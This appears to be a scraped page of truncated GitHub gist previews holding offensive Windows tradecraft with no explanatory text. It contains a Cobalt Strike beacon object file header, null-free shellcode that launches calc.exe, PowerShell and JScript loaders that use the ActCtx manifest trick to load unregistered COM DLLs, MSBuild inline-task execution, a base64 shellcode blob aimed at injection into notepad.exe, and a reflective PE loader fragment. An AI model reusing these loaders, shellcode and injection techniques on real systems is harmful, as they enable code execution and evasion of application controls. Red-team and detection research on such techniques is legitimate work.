This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <string.h> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <psapi.h> | |
#include "beacon.h" | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcesses(DWORD *, DWORD, LPDWORD); | |
DECLSPEC_IMPORT WINBASEAPI HANDLE WINAPI KERNEL32$OpenProcess(DWORD, BOOL, DWORD); | |
DECLSPEC_IMPORT BOOL WINAPI KERNEL32$K32EnumProcessModulesEx(HANDLE, HMODULE*, DWORD, LPDWORD, DWORD); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
; Copyright (c) 2009-2014, Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com> | |
; and Peter Ferrie <peter.ferrie@gmail.com> | |
; Project homepage: http://code.google.com/p/win-exec-calc-shellcode/ | |
; All rights reserved. See COPYRIGHT.txt for details. | |
; Windows x64 null-free shellcode that executes calc.exe. | |
; Works in any x64 application for Windows 5.0-6.3 all service packs. | |
; | |
; nasm -f win64 LoadRunner.asm |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#Doesn't Even Have to Be A Conformant COM DLL To trigger the load. | |
# Sample DLL To inject here | |
# https://github.com/redcanaryco/atomic-red-team/tree/master/atomics/T1179 | |
$manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="LiterallyDoesentMatter" version="6.6.6.0"/> <file name="Anyname.dll.anything"> <comClass description="Any Description HERE" clsid="{89565276-A714-4a43-91FE-EDACDCC0FFEE}" threadingModel="Both" progid="JustMakeSomethingUp"/> </file> </assembly>'; | |
$ax = new-object -Com "Microsoft.Windows.ActCtx" | |
$ax.ManifestText = $manifest; | |
$DWX = $ax.CreateObject("JustMakeSomethingUp"); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
//Example Reference: | |
// https://unit42.paloaltonetworks.com/unit42-houdinis-magic-reappearance/ | |
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>'; | |
var fso = new ActiveXObject("Scripting.FileSystemObject"); | |
var dropPath = fso.GetSpecialFolder(2); | |
// Create Base64 Object, supports encode, decode | |
var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.charac |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe kernel.xml --> | |
<Target Name="Hello"> | |
<ClassExample /> | |
</Target> | |
<UsingTask | |
TaskName="ClassExample" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="MyTarget"> | |
<SimpleTask MyProperty="My voice is my passport." | |
MyCode="/EiD5PDowAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdCLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpV////11IugEAAAAAAAAASI2NAQEAAEG6MYtvh//Vu/C1olZBuqaVvZ3/1UiDxCg8BnwKgPvgdQW7RxNyb2oAWUGJ2v/VY2FsYy5leGUA" | |
MyProcess="C:\Windows\notepad.exe"/> | |
</Target> | |
<UsingTask TaskName="SimpleTask" AssemblyFile="AllIDoIsWinWinWin.dll" /> | |
</Project> | |
*/ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
try { | |
new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Users\\Public'; | |
var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="DynamicWrapperX" version="2.2.0.0"/> <file name="dynwrapx.dll.blg"> <comClass description="DynamicWrapperX Class" clsid="{89565276-A714-4a43-912E-978B935EDCCC}" threadingModel="Both" progid="DynamicWrapperX"/> </file> </assembly>'; | |
// Create Base64 Object, supports encode, decode | |
//Magic is just a cool way to decode to byte array ; | |
function Magic(r){if(!/^[a-z0-9+/]+={0,2}$/i.test(r)||r.length%4!=0)throw Error("Not base64 string");for(var t,e,n,o,i,a,f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",h=[],d=0;d<r.length;d+=4)t=(a=f.indexOf(r.charAt(d))<<18|f.indexOf(r.charAt(d+1))<<12|(o=f.indexOf(r.charAt(d+2)))<<6|(i=f.indexOf(r.charAt(d+3))))>>>16&255,e=a>>> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
MapImg = MemAllocateStomped( &fTable, ImgLen ); | |
if ( !MapImg ) { | |
sParam.ImgMod = TRUE; | |
MapImg = MemAllocateVirtual( &fTable, ImgLen ); | |
}; | |
InlineZeroMemory( MapImg, ImgLen ); | |
SecHdr = IMAGE_FIRST_SECTION( NtsHdr ); | |
for ( INT i = 0 ; i < NtsHdr->FileHeader.NumberOfSections ; ++i ) { |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
<Target Name="Hello" > | |
<!-- Call ANY .NET API --> | |
<!-- | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Make Sure dynwrapx,dll is in %temp% | |
$a = new-object -com Microsoft.Windows.ActCtx | |
$a.ManifestURL = 'https://gist.githubusercontent.com/subTee/36df32293bc5006148bb6b03b5c4b2c1/raw/661b5aafd55288930761d9ad4eabe7403146ab5c/dynwrapx.dll.manifest' | |
$b = $a.CreateObject("DynamicWrapperX") | |
$b.Register("user32.dll", "MessageBoxW", "i=hwwu", "r=l") | Out-Null | |
$b.MessageBoxW(0, "Hello, world!", "Test", 4) | Out-Null | |